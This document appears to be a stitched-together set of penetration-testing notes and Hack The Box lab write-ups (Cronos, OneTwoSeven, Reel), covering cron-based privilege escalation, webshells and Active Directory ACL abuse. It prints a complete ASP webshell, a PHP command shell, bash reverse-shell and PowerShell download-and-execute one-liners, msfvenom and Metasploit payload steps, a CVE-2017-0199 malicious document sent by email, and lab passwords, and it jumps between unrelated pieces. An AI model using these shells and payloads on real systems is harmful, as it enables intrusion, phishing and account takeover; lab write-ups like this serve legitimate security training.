We need to upload txt because we cannot upload php. Hence first upload txt and then rename to .php
Now start 1st netcat listener and get the shell. by browsing to http://admin.cronos.htb/puckie.php

root@kali:~/Desktop# nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 45074
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:15:46 up 1 day, 16:28, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@cronos:/$
check /etc/crontab
$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The last scheduled activity executes a process called artisan locate in /var/www/laravel
When we check the file’s permissions:

100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan

So we can replace this file with our payload.
Create a new payload and upload it here.
Rename it to artisan
Make it executable by chmod +x artisan
Put this 2nd netcat listener to background and listen for the new connection

root@kali:~/Desktop# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 37984
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 21:52:01 up 1 day, 17:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
#

Wait for 1 minute as the executes every one minute
You’ll get root access

Author: Jacco Straathof

curl-tty-shell

.

┌─[puck@parrot-lt]─[~/htb/onetwoseven]
└──╼ $cat cmd.php
<?php system($_GET['cmd']); ?>

.

┌─[✗]─[puck@parrot-lt]─[~/htb/onetwoseven]
└──╼ $curl -G http://localhost:60080/addons/cmd.php --data-urlencode ​"cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.12/4444 0>&1'"

 

i used a pentestmonkey php reverse shell,  so now just setup a nc listener and catch your shell

nc -lvp 443
now we have the shell, we can try to get a TTY shell with python,
python -c "import pty; pty.spawn('/bin/bash')"
python3 -c 'import pty; pty.spawn("/bin/sh")'

however if python was not installed, i use this

script /dev/null -c bash

voila now we have a TTY Shell

ASP Webshell for IIS 8.0 & 8.5

<!--
ASP Webshell

Working on latest IIS 

Referance :- 
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
http://www.w3schools.com/asp/


-->


<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

meterpreter reverse shell with powershell

1 Create Shell

root@kali:~/htb# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh file: 3255 bytes
Saved as: meterpreter-64.ps1

2 Setup listener

msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.178.16; set lport 443; set ExitOnSession false; exploit -j"

3. Interact

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.17.25-dev ]
+ -- --=[ 1828 exploits - 1033 auxiliary - 318 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.178.16
lport => 443
ExitOnSession => false
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.178.16:443 
msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.178.10
[*] Meterpreter session 1 opened (192.168.178.16:443 -> 192.168.178.10:53418) at 2018-11-21 14:27:09 -0500

msf exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows HTB\administrator @ PUCKIE 192.168.178.16:443 -> 192.168.178.10:53418 (192.168.178.10)

4.  if Windows Defender is enabled

PS C:\PENTEST> C:\PENTEST\meterpreter-64.ps1
At C:\PENTEST\meterpreter-64.ps1:1 char:1
+ $VlSIhDyrsor = @"
+ ~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent


PS C:\PENTEST>

5. Summary: The the generated ps1 can be saved to disk, and is not detected as a virus , and runs succesfull creating a shell, but it can’t run with defender enabled on my windows 10 box.

(c)2018 Jacco Straathof

 

htb-reel-nl

Today we are going to solve another CTF challenge “Reel” which is available online for those who want to increase their skill in penetration testing. Reel is retried vulnerable lab presented by Hack the Box.Level: IntermediateTask: find user.txt and root.txt file on victim’s machine.Let’s begin with nmap port enumeration.

 

c:\Users\jacco>nmap -sC -sV 10.10.10.77
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-26 19:16 W. Europe Standard Time
Nmap scan report for 10.10.10.77
Host is up (0.028s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| |_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=2/26%Time=5C758296%P=i686-pc-windows-windows%r(
SF:NULL,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\
--snip--
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.32 seconds


Thats quite an interesting attack surface we have right here! There”s no web service listening on this box, so right away we see this isn”t going to be the typical webapp-exploit-then-root machine, which is cool!

Whenever I see FTPs, the first thing I always try is anonymous login, so lets go for that.

# ftp 10.10.10.77

Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
226 Transfer complete.

Perfect! Let’s see what documents we can download:

ftp> cd documents
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.

After promptly getting the three files, we, as good kids, read the readme.txt first, because that is what we are supposed to do, right?

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

Hmmm. Converting RTFs to what? DOCX maybe? Since the other documents in the directory are Microsoft Word documents, that seems a reasonable guess to make. Now, I am unable to read Windows Event Forwarding.docx, my LibreOffice spits out an error everytime I try, but I have more luck with AppLocker.docx. It says:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Ok, bad news. This probably means we will have to face AppLocker once we get a shell on the box. But we are far from that! So, now what?

The wonders of metadata

We have a good amount of information from our enumeration phase. Now it is time to craft a meticulously planned several-stage attack or to bang our heads against the machine until something works. Yay, hacking!

We know from our nmap scan that the server has an SMTP service listening at port 25, which kind of sticks out now because of the readme.txt we previously read. So maybe we are capable of using this SMTP server to send e-mails, but to whom?

Well, whoever wrote/converted the documents in the FTP server, she is probably a user of the machine and therefore a potential victim. So is there a chance her user account is somewhere in the generated documents?

Now, I have a confession to make. I dont usually add it to my writeups unless it gives some useful information, but I use exiftool on almost EVERYTHING I find during reconaissance when solving CTFs or doing pentest. Itís probably some kind of derangement that affected me after my first three or four CTF-like machines involved searching for metadata in images or documents.

So you can imagine I got really happy when I ran exiftool on the three documents and one of them was bingo:

# exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 11.16
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 14 kB
File Modification Date/Time     : 2018:09:21 14:53:40+02:00
File Access Date/Time           : 2018:10:21 10:43:29+02:00
File Inode Change Date/Time     : 2018:09:30 21:12:19+02:00
File Permissions                : rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Characters                      : 1709
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 14
Paragraphs                      : 4
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         :
Links Up To Date                : No
Characters With Spaces          : 2004
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 14.0000

Do you see that beautiful Creator field over there? We got an e-mail address, and probably a user of the box too!

Now I can actually make some kind of attack plan as if this was some cool heist movie (I know this is cheesy but don t ruin this for me ok?):

  1. Craft a malicious RTF document (research on how to this because I”ve never done something similar!)
  2. Use the SMTP service running on the box to send it to nico@megabank.com, hoping he’ll open it in a vulnerable Word version in order to convert it
  3. Wait patiently for the shell

Yeah, seems easy right? (Narrator: it was not)

Malicious documents

The first thing we should do is searching for a suitable (and somewhat recent) exploit that could affect nico when he opens our RTF document. Our best friend searchsploit to the rescue!

A quick inspection of the exploit file with searchsploit -x 41934 reveals the CVE field (2017-0199) which, apart from looking more recent, is a fantastic field for searching in Metasploit.

msf > search office_word_hta

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   exploit/windows/fileformat/office_word_hta  2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution


msf > use exploit/windows/fileformat/office_word_hta
msf exploit(windows/fileformat/office_word_hta) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/fileformat/office_word_hta) > set srvhost 10.10.14.20
srvhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf exploit(windows/fileformat/office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 10.10.14.20 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Microsoft Office Word

download hta from http://10.10.14.20:8080/default.hta and copy doc attachment to send

root@kali:~/htb/reel/2019# wget http://10.10.14.20:8080/default.hta
--2019-02-26 15:33:23--  http://10.10.14.20:8080/default.hta
Connecting to 10.10.14.20:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6361 (6.2K) [application/hta]
Saving to: ‘default.hta’

default.hta                                 100%[===============================================================================================>]   6.21K  --.-KB/s    in 0s      

2019-02-26 15:33:24 (746 MB/s) - ‘default.hta’ saved [6361/6361]

root@kali:~/htb/reel/2019# cp /root/.msf4/local/msf.doc .
root@kali:~/htb/reel/2019# cp ~/Downloads/default.hta .
root@kali:~/htb/reel/2019# ls
default.hta  msf.doc

send mail

root@kali:~/htb/reel/2019# ls
default.hta msf.doc
root@kali:~/htb/reel/2019# sendEmail -f puckie2@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
^CFeb 26 15:23:23 kali sendEmail[9312]: EXITING: Received SIGINT
root@kali:~/htb/reel/2019# sendEmail -f puckie3@megabank.com -t nico@megabank.com -u RTF -m "2Please convert file" -a msf.doc -s 10.10.10.77
Feb 26 15:23:51 kali sendEmail[9364]: Email was sent successfully!

catch shell

msf exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.14.20:4444 
[+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://10.10.14.20:8080/default.hta
[*] Server started.
msf exploit(windows/fileformat/office_word_hta) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.77



msf exploit(windows/fileformat/office_word_hta) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  10.10.14.20:4444 -> 10.10.10.77:57400 (10.10.10.77)

msf exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

C:\Windows\system32>whoami
whoami
htb\nico

C:\Windows\system32>
alternative for generating RTF payload : python cve-2017-0199_toolkit.py -M gen -t RTF -w puckie.rtf -u http://10.10.14.20/puckie.ps1 -x 0

AppUnLocker

tom@REEL C:\Users\tom>sharphound.exe -c all 
This program is blocked by group policy. For more information, contact yo
ur system administrator.

There are different techniques on the web to work around AppLocker. They are gathered on this Github .
For more details many of these examples are described on the pentestlab blog .

It’s easier to get a basic reverse shell by calling a Powershell script without the ps1 extension:

Nico

We finally have a shell on this box. It’s going to be easy from here, right? Of course, that malicious document thing is the peak of difficulty of this machine, is it not? (Narrator: again, it was not)

Normally, my first serious move when landing on a Windows machine is running PowerUp.ps1, analyze the results and work from there. But, before that, I like to peek around, at least the home directory of the user I have accessed with. So, to C:\Users\nico\ we go!

In his Desktop, aside from the user.txt flag (yay!), thereis an interesting file called cred.xml:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

Hey, I know the type PSCredential! As the name of the file suggests, it probably contains credentials, and judging by its contents, they belong to the user tom. Thats great! Its only a matter of researching what type of file is this and how to obtain the plain-text password from it. After googling a little, two StackOverflow answers help me understand that this file is the XML representation of a serialized Powershell object, more specifically a PSCredential one. And that the Powershell command Import-Clixml can help us undoing the process:

nico@REEL C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Form
at-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Go On MoveThe most interesting once connected with Tom is the presence of a note left in an AD Audit folder

tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).

Maybe we should re-run Cypher query against other groups we've created.

And in this folder is a copy of BloodHound waiting for us.

BloodHound is a tool that allows to make graphs of relationship between the different objects of an ActiveDirectory (users, groups, machines, etc) and thus to highlight the presence of problems of permission making it possible to trace up privileges of domain administrator. An explanatory video can be seen on YouTube .

Bloodhound has a graphic part. The other part is used to generate the CSVs from which the graphs will be generated:

tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>powershell -nop -exec bypass

Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Invoke-Bloodhound
Initializing BloodHound at 5:15 PM on 2/26/2019
Starting Default enumeration for HTB.LOCAL
Status: 29 objects enumerated (+29 Infinity/s --- Using 69 MB RAM )
Finished enumeration for HTB.LOCAL in 00:00:00.3830422
0 hosts failed ping. 0 hosts timedout.

PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> dir

Directory: C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2017 11:50 PM 112225 acls.csv
-a--- 2/26/2019 5:15 PM 4433 BloodHound.bin
-a--- 10/24/2017 4:27 PM 246489 BloodHound_Old.ps1
-a--- 2/26/2019 5:15 PM 4366 group_membership.csv
-a--- 2/26/2019 5:15 PM 179 local_admins.csv
-a--- 10/24/2017 4:27 PM 568832 SharpHound.exe
-a--- 10/24/2017 4:27 PM 636959 SharpHound.ps1
We can call more finely the module or launch more exhaustive. In any case, it generates CSV files in the current directory that is hastily repatriated to load in BloodHound that we have previously installed and configured .

BloodHound has a path search feature that here does not return anything from Tom to the Domain Admins group . But if we are interested in the rights we currently have it becomes interesting:
HackTheBox Reel Tom writeOwner Clear LDAP Bloodhound

Here we have the right writeOwner that defines who is the owner of the user Claire.
It’s also possible to find this relationship directly with PowerView:

tom@REEL C:\Users\tom>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Import-Module .\PowerView.ps1


 

PS C:\Users\tom\Desktop\AD Audit\Bloodhound> Get-DomainObjectACL -Identity Claire -ResolveGUIDs

AceQualifier : AccessAllowed
InheritanceFlags : None
ObjectSID : S-1-5-21-2648318136-3688571242-2924127574-1130
IsCallback : False
AceType : AccessAllowedObject
AuditFlags : None
PropagationFlags : None
ObjectAceType : User-Account-Restrictions
OpaqueLength : 0
ActiveDirectoryRights : ReadProperty
AccessMask : 16
AceFlags : None
BinaryLength : 56
ObjectDN : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
InheritedObjectAceType : All
SecurityIdentifier : S-1-5-21-2648318136-3688571242-2924127574-553
ObjectAceFlags : ObjectAceTypePresent
IsInherited : False

To exploit this we use the PowerView Set-DomainObjectOwner command . It is documented on the blog of wald0 (one of the authors).

PowerSploit has reference documentation for the command.

tom@REEL C:\Users>powershell -version 2 -nop -exec bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users>
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Import-Module .\PowerView.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights A
ll
PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user claire !l33tpassw0rd /domain
The command completed successfully.

PS C:\Users\tom\Desktop\AD Audit\BloodHound> net user Claire
User name claire
Full Name Claire Danes
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/26/2019 5:24:38 PM
Password expires Never
Password changeable 2/27/2019 5:24:38 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/29/2018 11:34:58 PM

Logon hours allowed All

Local Group Memberships *Hyper-V Administrator
Global Group memberships *Domain Users *MegaBank_Users
*DR_Site *Restrictions
The command completed successfully.

We agree here all rights on Claire. Note that recovering only the ResetPassword permission does not seem to be enough to change the password.

Raise Your Hands

By recovering access to Claire I expected that we can then jump to the account claire_da which is domain admin … But in fact no
Claire has permission writeDACL on the group backup admins:
HackTheBox Reel BloodHound Clear writeDACL on Backup Admins group LDAP

and this group has so to speak of nothing at all (there are only incoming relations).
HackTheBox BloodHound reel backup admins relationship graph LDAP

If we talk a little about this type of group we see that members usually have unrestricted access to the file system:

A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut down.

We can then grant the privileges of adding a member and add us to the group:

PS C:\windows\temp> Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights WriteMembers
PS C:\windows\temp> net group Backup_Admins claire /add
The command completed successfully.
But disappointment: although one has the rights on the personal file of the administrator:
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
Access to root.txt (the final flag) is denied us 🙁

Several Powershell scripts are present in a subfolder Backup Scripts and an archive BackupScript.zip .

I had the good idea to make a diff of the ps1 files present and those of the zip:

1
2
3
4
5
root@kali:~/Documents/reel/Backup Scripts$ diff BackupScript.ps1 yolo/BackupScript.ps1
1,2c1,41
< # admin password
< $password="Cr4ckMeIfYouC4n!"
--- snip ---

Claire

Ok, we are near! We only need to do something similar for the BACKUP_ADMINS group and see what being part of it means.

Of course, since we changed users, we need to load PowerView again:

> powershell
> IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.12.157/PowerView.ps1')

And again guided by the fantastic An Ace Up The Sleeve article, we can grant ourselves all ACL rights over BACKUP_ADMINS, since we have the WriteDacl permission:

> Add-DomainObjectACL -TargetIdentity 'Backup_Admins' -PrincipalIdentity claire -Rights All

With these rights, we should be able to add ourselves to the group:

> net group Backup_Admins /add claire

No errors, seems good! We can check it worked by running net user claire and seeing we are indeed a proud member of BACKUP_ADMINS. Great! Now what?

Note

At this point, while I was exploring Claire as a BACKUP_ADMINS member, other Hack The Box users were constantly resetting Claire’s password to other values, so if I logged out (you will see why in a moment) I couldn’t log back in. I ended up leaving Toms SSH session open and prepared a script to automate the process of resetting Claire’s password to the value I wanted so, if someone changed it, I could easily change it back. My ResetClairePassword.ps1 script was like this:

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
$SecPasswd = ConvertTo-SecureString -String 's0mepassw0rd' -AsPlainText -Force
Set-ADAccountPassword -Reset -NewPassword $SecPasswd -Identity claire 

Backup Admin

Another shameful confession. I wasted a lot of time at this point, and it was pretty frustrating. It required a lot of work reaching to this point, and it seemed it was for nothing. I couldn’t access Administrator home directory, I couldn’t read or write new files compared to base Claire, BACKUP_ADMINS didn’t have any control over other AD objects according to BloodHound So, was all this work for nothing?!

Turns out you have to log out and log in again for group changes to take effect. Its something obvious, its something I knew from Linux (it works the same way there), but my tired brain couldn’t remember it and that meant a lot of frustration and wasted time wandering around. Lesson learned (even though I thought I already knew this): if you are tired, take a break! Even if you feel the victory so near you could touch it, working with a tired mind almost always doesn’t pay off.

Ok, after this dramatic complication, we can continue! Log out, log in again, and the group change takes effect. Now, as Claire, we can access C:\Users\Administrator. Finally!! Lets read root.txt and claim our well deserved prize:

claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.

God dammit!

It couldn’t be that easy, right? It seems there are other things in Administrators Desktop. Lets see what this Backup Scripts folder is.

> cd "C:\Users\Administrator\Desktop\Backup Scripts"
> dir
  Volume in drive C has no label
  Volume Serial number is CC8A-33E1

  Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017	09:47 PM	<DIR>		.
11/02/2017	09:47 PM	<DIR>		..
11/03/2017	11:22 PM		    845	backup.ps1
11/02/2017	09:37 PM		    462	backup1.ps1
11/03/2017	11:21 PM		  5,642	BackupScript.ps1
11/02/2017	09:43 PM		  2,791	BackupScript.zip
11/03/2017	11:22 PM		  1,855	folders-system-state.txt
11/03/2017	11:22 PM		    308	test2.ps1.txt
		    6 File(s)		  11,903 bytes
		    2 Dir(s)      15,719,768,064 bytes free

Alright, its just digging work at this point. After reviewing these scripts one by one (which seem to be used to automate the backup process of some directories of the box), we finally find what we are looking for:

> type BackupScript.ps1
# admin password                                                                                                
$password="Cr4ckMeIfYouC4n!" 
[...]

Is this it? Are we done?

PS C:\Users\jacco> ssh Administrator@10.10.10.77
Administrator@10.10.10.77's password:Cr4ckMeIfYouC4n! Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. administrator@REEL C:\Users\Administrator>cd Desktop administrator@REEL C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is CC8A-33E1 Directory of C:\Users\Administrator\Desktop 21/01/2018 14:56 <DIR> . 21/01/2018 14:56 <DIR> .. 02/11/2017 21:47 <DIR> Backup Scripts 28/10/2017 11:56 32 root.txt 1 File(s) 32 bytes 3 Dir(s) 15,675,449,344 bytes free administrator@REEL C:\Users\Administrator\Desktop>type root.txt 101*****32a

The DACLS way instead of powerview.ps1

Tom take over claire: Grant Generic all to Tom and allow him to change Claire password
https://ss64.com/nt/dsacls.html
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /takeownership &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G tom:GA &&
dsacls "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL" /G "tom:CA;Reset Password"

Now change claire password to Password!

Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

login as tom
net user tom

Regards Puckie

Powerview Caught By Windows Defender

screen2

It has finally happened: @harmj0y‘s Powerview Powershell cmdlet was caught by Symantec Endpoint Protection (SEP) during a pentest this week. The cmdlet is SID 29038  in Symantec’s attack signature database.

Scenario

During testing I used the following one-liner to download import the powerview.ps1 script and then execute Invoke-FindLocalAdminAcess from a general user’s desktop:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<IPADDRESS>/powerview.ps1'); Invoke-FindLocalAdminAccess

